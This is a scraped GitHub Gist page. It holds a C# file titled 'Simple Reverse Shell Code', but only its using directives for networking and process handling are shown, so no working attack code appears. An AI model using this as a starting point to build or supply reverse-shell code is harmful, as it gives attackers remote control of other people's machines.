Skip to content

Instantly share code, notes, and snippets.

View hit-monchan's full-sized avatar

hit-monchan

View GitHub Profile
@BankSecurity
BankSecurity / Simple_Rev_Shell.cs
Last active September 9, 2024 14:46
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;